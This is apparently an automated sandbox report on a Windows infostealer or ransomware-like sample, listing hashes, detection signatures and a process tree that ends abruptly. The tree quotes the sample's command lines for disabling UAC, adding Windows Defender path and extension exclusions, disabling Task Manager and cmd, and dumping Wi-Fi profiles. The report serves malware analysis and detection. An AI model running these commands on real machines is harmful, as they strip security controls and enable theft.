Analysis
-
max time kernel
48s -
max time network
42s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-12-2024 21:32
Behavioral task
behavioral1
Sample
main.exe
Resource
win11-20241007-en
General
-
Target
main.exe
-
Size
34.1MB
-
MD5
eeb38085b04102207c7c48c118dc2f37
-
SHA1
e6dd4c5846ca9b18c25dd4e65cb132ca03508c8b
-
SHA256
87f0b82e20d4c24b11d74b2909c8027b932e3f53fe4fe27e92c7b37baba88daf
-
SHA512
b33d0cb5dc0fec990e1c061577ad09bffb1bba93f4cc5890bce8a5bf6872663b9dc4720c0f26bb2f266a2b95fc3bd7f2014c37d097d28287b796dcceceed4a92
-
SSDEEP
786432:t9YidhvMkqW8rK1QtICrhHJ5da8DZcUThl8Fsx6fg0TyVusDg:t9JbqW9iICrhDI61Ak4g0eUs
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1092 powershell.exe 2704 powershell.exe 4780 powershell.exe 3024 powershell.exe 3256 powershell.exe 708 powershell.exe 5740 powershell.exe 2368 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" rayxservice.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts rayxservice.exe -
Possible privilege escalation attempt 9 IoCs
pid Process 3920 icacls.exe 5924 icacls.exe 1580 icacls.exe 1184 icacls.exe 2376 icacls.exe 664 icacls.exe 3244 icacls.exe 2492 icacls.exe 3528 takeown.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qxheix39eo3o4lim.exe main.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6uomytgitcoau7ds.exe rayxservice.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6uomytgitcoau7ds.exe rayxservice.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qxheix39eo3o4lim.exe main.exe -
Executes dropped EXE 2 IoCs
pid Process 5904 rayxservice.exe 3700 rayxservice.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Minimal rayxservice.exe -
Loads dropped DLL 64 IoCs
pid Process 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe 4100 main.exe -
Modifies file permissions 1 TTPs 9 IoCs
pid Process 5924 icacls.exe 2492 icacls.exe 2376 icacls.exe 664 icacls.exe 3920 icacls.exe 3528 takeown.exe 1184 icacls.exe 3244 icacls.exe 1580 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
flow ioc 1 discord.com 7 discord.com 16 discord.com 25 discord.com 3 discord.com 5 discord.com 9 discord.com 11 discord.com 12 discord.com 15 discord.com 6 discord.com 8 discord.com 13 discord.com 14 discord.com -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com 27 api64.ipify.org 1 ipinfo.io 4 api.ipify.org 17 api.ipify.org 19 ipinfo.io 20 api64.ipify.org -
Enumerates processes with tasklist 1 TTPs 39 IoCs
pid Process 5032 tasklist.exe 5116 tasklist.exe 1388 tasklist.exe 1496 tasklist.exe 4704 tasklist.exe 1344 tasklist.exe 3088 tasklist.exe 3796 tasklist.exe 4752 tasklist.exe 5636 tasklist.exe 4268 tasklist.exe 3188 tasklist.exe 804 tasklist.exe 1164 tasklist.exe 6088 tasklist.exe 1548 tasklist.exe 1712 tasklist.exe 2172 tasklist.exe 412 tasklist.exe 4776 tasklist.exe 2172 tasklist.exe 3628 tasklist.exe 1896 tasklist.exe 5784 tasklist.exe 392 tasklist.exe 5812 tasklist.exe 4876 tasklist.exe 4420 tasklist.exe 584 tasklist.exe 4620 tasklist.exe 1552 tasklist.exe 2220 tasklist.exe 5092 tasklist.exe 1068 tasklist.exe 3908 tasklist.exe 4720 tasklist.exe 324 tasklist.exe 1832 tasklist.exe 5408 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
pid Process 2432 cmd.exe 5136 cmd.exe 2588 cmd.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x001900000002b06e-1171.dat pyinstaller -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 3 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5704 cmd.exe 4756 netsh.exe 5812 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 13 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vds.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vds.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\AttributesTableCache = a2a0d0ebe5b9334487c068b6b72699c70000000000000000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000ab2f6650cf45871d0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000ab2f66500000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900ab2f6650000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dab2f6650000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000ab2f665000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vds.exe -
Delays execution with timeout.exe 38 IoCs
pid Process 2980 timeout.exe 5848 timeout.exe 3104 timeout.exe 4116 timeout.exe 5100 timeout.exe 5716 timeout.exe 4600 timeout.exe 5932 timeout.exe 488 timeout.exe 2424 timeout.exe 5716 timeout.exe 3992 timeout.exe 5428 timeout.exe 3808 timeout.exe 5732 timeout.exe 4892 timeout.exe 6120 timeout.exe 4164 timeout.exe 4132 timeout.exe 1320 timeout.exe 3884 timeout.exe 5608 timeout.exe 1356 timeout.exe 5840 timeout.exe 6080 timeout.exe 3200 timeout.exe 584 timeout.exe 440 timeout.exe 5952 timeout.exe 844 timeout.exe 3980 timeout.exe 5428 timeout.exe 4872 timeout.exe 6088 timeout.exe 5536 timeout.exe 880 timeout.exe 32 timeout.exe 4948 timeout.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 572 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3788 taskkill.exe -
Modifies registry key 1 TTPs 12 IoCs
pid Process 6076 reg.exe 2392 reg.exe 1712 reg.exe 404 reg.exe 3612 reg.exe 1456 reg.exe 3140 reg.exe 4488 reg.exe 572 reg.exe 6060 reg.exe 4936 reg.exe 5928 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3564 schtasks.exe 2200 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 2704 powershell.exe 2704 powershell.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3256 powershell.exe 3256 powershell.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 1092 powershell.exe 1092 powershell.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 5740 powershell.exe 5740 powershell.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3024 powershell.exe 4780 powershell.exe 4780 powershell.exe 3024 powershell.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe 3700 rayxservice.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4100 main.exe Token: SeDebugPrivilege 4876 tasklist.exe Token: SeDebugPrivilege 2172 tasklist.exe Token: SeDebugPrivilege 3088 tasklist.exe Token: SeDebugPrivilege 3700 rayxservice.exe Token: SeDebugPrivilege 4420 tasklist.exe Token: SeDebugPrivilege 5032 tasklist.exe Token: SeDebugPrivilege 5116 tasklist.exe Token: SeDebugPrivilege 6088 tasklist.exe Token: SeDebugPrivilege 3908 tasklist.exe Token: SeDebugPrivilege 4720 tasklist.exe Token: SeDebugPrivilege 1388 tasklist.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 3256 powershell.exe Token: SeIncreaseQuotaPrivilege 5956 wmic.exe Token: SeSecurityPrivilege 5956 wmic.exe Token: SeTakeOwnershipPrivilege 5956 wmic.exe Token: SeLoadDriverPrivilege 5956 wmic.exe Token: SeSystemProfilePrivilege 5956 wmic.exe Token: SeSystemtimePrivilege 5956 wmic.exe Token: SeProfSingleProcessPrivilege 5956 wmic.exe Token: SeIncBasePriorityPrivilege 5956 wmic.exe Token: SeCreatePagefilePrivilege 5956 wmic.exe Token: SeBackupPrivilege 5956 wmic.exe Token: SeRestorePrivilege 5956 wmic.exe Token: SeShutdownPrivilege 5956 wmic.exe Token: SeDebugPrivilege 5956 wmic.exe Token: SeSystemEnvironmentPrivilege 5956 wmic.exe Token: SeRemoteShutdownPrivilege 5956 wmic.exe Token: SeUndockPrivilege 5956 wmic.exe Token: SeManageVolumePrivilege 5956 wmic.exe Token: 33 5956 wmic.exe Token: 34 5956 wmic.exe Token: 35 5956 wmic.exe Token: 36 5956 wmic.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 5740 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 708 powershell.exe Token: SeIncreaseQuotaPrivilege 5956 wmic.exe Token: SeSecurityPrivilege 5956 wmic.exe Token: SeTakeOwnershipPrivilege 5956 wmic.exe Token: SeLoadDriverPrivilege 5956 wmic.exe Token: SeSystemProfilePrivilege 5956 wmic.exe Token: SeSystemtimePrivilege 5956 wmic.exe Token: SeProfSingleProcessPrivilege 5956 wmic.exe Token: SeIncBasePriorityPrivilege 5956 wmic.exe Token: SeCreatePagefilePrivilege 5956 wmic.exe Token: SeBackupPrivilege 5956 wmic.exe Token: SeRestorePrivilege 5956 wmic.exe Token: SeShutdownPrivilege 5956 wmic.exe Token: SeDebugPrivilege 5956 wmic.exe Token: SeSystemEnvironmentPrivilege 5956 wmic.exe Token: SeRemoteShutdownPrivilege 5956 wmic.exe Token: SeUndockPrivilege 5956 wmic.exe Token: SeManageVolumePrivilege 5956 wmic.exe Token: 33 5956 wmic.exe Token: 34 5956 wmic.exe Token: 35 5956 wmic.exe Token: 36 5956 wmic.exe Token: SeDebugPrivilege 1832 tasklist.exe Token: SeDebugPrivilege 1496 tasklist.exe Token: SeSecurityPrivilege 496 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2476 wrote to memory of 4100 2476 main.exe 77 PID 2476 wrote to memory of 4100 2476 main.exe 77 PID 4100 wrote to memory of 5612 4100 main.exe 79 PID 4100 wrote to memory of 5612 4100 main.exe 79 PID 5612 wrote to memory of 6076 5612 cmd.exe 81 PID 5612 wrote to memory of 6076 5612 cmd.exe 81 PID 4100 wrote to memory of 4468 4100 main.exe 82 PID 4100 wrote to memory of 4468 4100 main.exe 82 PID 4468 wrote to memory of 3140 4468 cmd.exe 84 PID 4468 wrote to memory of 3140 4468 cmd.exe 84 PID 4100 wrote to memory of 3404 4100 main.exe 85 PID 4100 wrote to memory of 3404 4100 main.exe 85 PID 3404 wrote to memory of 4488 3404 cmd.exe 87 PID 3404 wrote to memory of 4488 3404 cmd.exe 87 PID 4100 wrote to memory of 3636 4100 main.exe 88 PID 4100 wrote to memory of 3636 4100 main.exe 88 PID 3636 wrote to memory of 572 3636 cmd.exe 90 PID 3636 wrote to memory of 572 3636 cmd.exe 90 PID 4100 wrote to memory of 5976 4100 main.exe 91 PID 4100 wrote to memory of 5976 4100 main.exe 91 PID 4100 wrote to memory of 2588 4100 main.exe 92 PID 4100 wrote to memory of 2588 4100 main.exe 92 PID 4100 wrote to memory of 5136 4100 main.exe 93 PID 4100 wrote to memory of 5136 4100 main.exe 93 PID 4100 wrote to memory of 2432 4100 main.exe 94 PID 4100 wrote to memory of 2432 4100 main.exe 94 PID 4100 wrote to memory of 3564 4100 main.exe 95 PID 4100 wrote to memory of 3564 4100 main.exe 95 PID 5136 wrote to memory of 3848 5136 cmd.exe 101 PID 5136 wrote to memory of 3848 5136 cmd.exe 101 PID 2588 wrote to memory of 3620 2588 cmd.exe 102 PID 2588 wrote to memory of 3620 2588 cmd.exe 102 PID 2432 wrote to memory of 5508 2432 cmd.exe 103 PID 2432 wrote to memory of 5508 2432 cmd.exe 103 PID 5976 wrote to memory of 4876 5976 cmd.exe 104 PID 5976 wrote to memory of 4876 5976 cmd.exe 104 PID 5976 wrote to memory of 1120 5976 cmd.exe 105 PID 5976 wrote to memory of 1120 5976 cmd.exe 105 PID 4100 wrote to memory of 2148 4100 main.exe 106 PID 4100 wrote to memory of 2148 4100 main.exe 106 PID 2148 wrote to memory of 5924 2148 cmd.exe 108 PID 2148 wrote to memory of 5924 2148 cmd.exe 108 PID 4100 wrote to memory of 5900 4100 main.exe 110 PID 4100 wrote to memory of 5900 4100 main.exe 110 PID 5900 wrote to memory of 2492 5900 cmd.exe 112 PID 5900 wrote to memory of 2492 5900 cmd.exe 112 PID 5976 wrote to memory of 5904 5976 cmd.exe 109 PID 5976 wrote to memory of 5904 5976 cmd.exe 109 PID 5976 wrote to memory of 2980 5976 cmd.exe 113 PID 5976 wrote to memory of 2980 5976 cmd.exe 113 PID 4100 wrote to memory of 5844 4100 main.exe 114 PID 4100 wrote to memory of 5844 4100 main.exe 114 PID 5844 wrote to memory of 1184 5844 cmd.exe 116 PID 5844 wrote to memory of 1184 5844 cmd.exe 116 PID 5976 wrote to memory of 2172 5976 cmd.exe 117 PID 5976 wrote to memory of 2172 5976 cmd.exe 117 PID 5976 wrote to memory of 5964 5976 cmd.exe 118 PID 5976 wrote to memory of 5964 5976 cmd.exe 118 PID 5976 wrote to memory of 5608 5976 cmd.exe 119 PID 5976 wrote to memory of 5608 5976 cmd.exe 119 PID 5904 wrote to memory of 3700 5904 rayxservice.exe 120 PID 5904 wrote to memory of 3700 5904 rayxservice.exe 120 PID 5976 wrote to memory of 3088 5976 cmd.exe 121 PID 5976 wrote to memory of 3088 5976 cmd.exe 121 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStore = "1" rayxservice.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 3848 attrib.exe 5508 attrib.exe 3620 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\main.exe"C:\Users\Admin\AppData\Local\Temp\main.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\main.exe"C:\Users\Admin\AppData\Local\Temp\main.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"3⤵
- Suspicious use of WriteProcessMemory
PID:5612 -
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f4⤵
- Modifies registry key
PID:6076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"3⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
PID:3140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"3⤵
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f4⤵
- Modifies registry key
PID:4488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"3⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
PID:572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\systemrayxadmin\system.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:5976 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:1120
-
-
C:\Users\systemrayxadmin\rayxservice.exe"C:\Users\systemrayxadmin\rayxservice.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5904 -
C:\Users\systemrayxadmin\rayxservice.exe"C:\Users\systemrayxadmin\rayxservice.exe"5⤵
- Disables cmd.exe use via registry modification
- Drops file in Drivers directory
- Drops startup file
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3700 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"6⤵PID:3428
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f7⤵
- Modifies registry key
PID:6060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"6⤵PID:5700
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- UAC bypass
- Modifies registry key
PID:4936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"6⤵PID:3972
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f7⤵
- Modifies registry key
PID:2392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"6⤵PID:1584
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f7⤵
- UAC bypass
- Modifies registry key
PID:1712
-
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f6⤵PID:3756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\SYSTEM32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f6⤵
- Disables cmd.exe use via registry modification
- Modifies registry key
PID:404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'D:\'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"6⤵PID:2268
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f7⤵
- Modifies registry key
PID:3612
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath '.exe'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\SYSTEM32\netsh.exenetsh wlan show profiles6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath '.bat'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath '.vbs'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath '.py'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
